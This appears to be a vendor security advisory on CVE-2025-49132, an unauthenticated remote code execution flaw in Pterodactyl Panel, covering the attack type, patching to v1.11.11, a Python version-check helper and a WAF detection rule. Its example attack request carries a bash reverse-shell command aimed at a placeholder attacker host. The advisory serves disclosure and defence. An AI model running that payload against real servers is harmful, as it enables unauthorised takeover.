CVE-2025-49132 is a critical RCE vulnerability that allows information disclosure or code execution within the Pterodactyl Panel server without authentication.
Attackers can steal configurations or take control of the server, making prompt patching extremely important.
Our AIWAF product is developing detection patterns to address vulnerabilities identified within Pterodactyl and will continue to respond quickly to newly discovered vulnerabilities.
1. Overview
Pterodactyl Panel is an open-source game server management panel designed to allow users to easily deploy and manage various game servers in a web-based environment.
The panel leverages Docker and container-based architecture to ensure scalability and stability, while providing intuitive UI and fine-grained access control in multi-user environments. In both enterprise and community contexts, it is widely used for multi-game server operations, hosting automation, user management, and resource monitoring.
This report summarizes the analysis of the recently identified unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2025-49132), discovered in versions prior to Pterodactyl Panel v1.11.11.
Source: https://pterodactyl.io/
2. Attack Type
CVE-2025-49132 is a Remote Code Execution (RCE) vulnerability discovered in versions of Pterodactyl Panel prior to v1.11.11.
The root cause of this vulnerability lies in authentication bypass and insufficient input validation.
An attacker can exploit flaws in session validation logic or improper permission handling during specific API requests in Pterodactyl Panel.
Commands that should normally require administrator privileges can be executed through manipulated requests even without authentication.
Pterodactyl Panel provides command execution features that interact with Docker containers and host systems for server management convenience.
However, because inputs are insufficiently filtered and executed directly on the server side, attackers can inject malicious requests that trigger arbitrary system commands.
Through this, attackers can obtain reverse shells, download and execute files, install backdoors, and ultimately seize full control of the server.
Example Attack Request:
POST /api/servers/123/execute HTTP/1.1
Host: vulnerable-pterodactyl.example.com
Authorization: Bearer <manipulated or missing token>
Content-Type: application/json

{
  "command": "bash -i >& /dev/tcp/attacker.com/4444 0>&1"
}
If the above request is successfully processed, the server executes the bash command, establishing a reverse shell connection to the attacker’s server (attacker.com).
From there, the attacker can enter the server environment and carry out further malicious actions.
3. Mitigation
Pterodactyl addressed this vulnerability in v1.11.11. The most reliable countermeasure is to immediately update to this version or later, which includes improved input validation and path traversal protection.
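Because the mitigation is a version floor, here is an added helper (written for this report, not Pterodactyl's own tooling) that decides whether an installed panel is at or above v1.11.11. It reads the version string out of a constructed config/app.php fragment; that the panel records its release under a 'version' key in that file is an assumption, as is treating a non-numeric marker such as 'canary' as a development build that needs manual verification. The point it adds to the text is that the comparison has to be numeric per component, since a plain string comparison would rank 1.9.9 above 1.11.11.

```python
import re
from typing import Optional, Tuple

# Fixed release stated in the advisory.
PATCHED_VERSION: Tuple[int, int, int] = (1, 11, 11)

# Constructed stand-in for a panel's config/app.php. The 'version' key is an
# assumption about where the panel records its release number.
SAMPLE_APP_CONFIG = """<?php

return [
    'version' => '1.11.10',
    'name' => env('APP_NAME', 'Pterodactyl'),
    'debug' => false,
];
"""


def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    """Turn '1.11.10' or 'v1.11.10' into (1, 11, 10). Returns None for
    non-numeric markers such as 'canary' (assumed to denote a dev build),
    which cannot be compared and need manual verification."""
    match = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if match is None:
        return None
    return tuple(int(part) for part in match.groups())


def is_patched(version_text: str) -> Optional[bool]:
    """True if at or above the fixed release, False if below, None if unknown.
    Components are compared as integers: '1.9.9' is older than '1.11.11'
    even though it sorts later as a string."""
    parsed = parse_version(version_text)
    if parsed is None:
        return None
    return parsed >= PATCHED_VERSION


def version_from_app_config(php_source: str) -> Optional[str]:
    """Pull the 'version' => '...' entry out of a Laravel-style config file."""
    match = re.search(r"'version'\s*=>\s*'([^']*)'", php_source)
    return match.group(1) if match else None


if __name__ == "__main__":
    found = version_from_app_config(SAMPLE_APP_CONFIG)
    print("installed:", found, "patched:", is_patched(found or ""))
```

A None result from is_patched is deliberately distinct from False: an unrecognised version string should prompt a manual check rather than be silently counted as either safe or vulnerable.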
Our AIWAF product responds to this threat through the "311: Command Injection (Unix) 2" detection pattern.
4. Conclusion
CVE-2025-49132 is a critical RCE vulnerability that allows unauthenticated remote information exposure or code execution within the Pterodactyl Panel server.
Attackers can steal configurations or take over the server, making prompt patching essential.
Our AIWAF product will continue developing detection patterns to address vulnerabilities identified in Pterodactyl and will respond swiftly to any newly discovered vulnerabilities.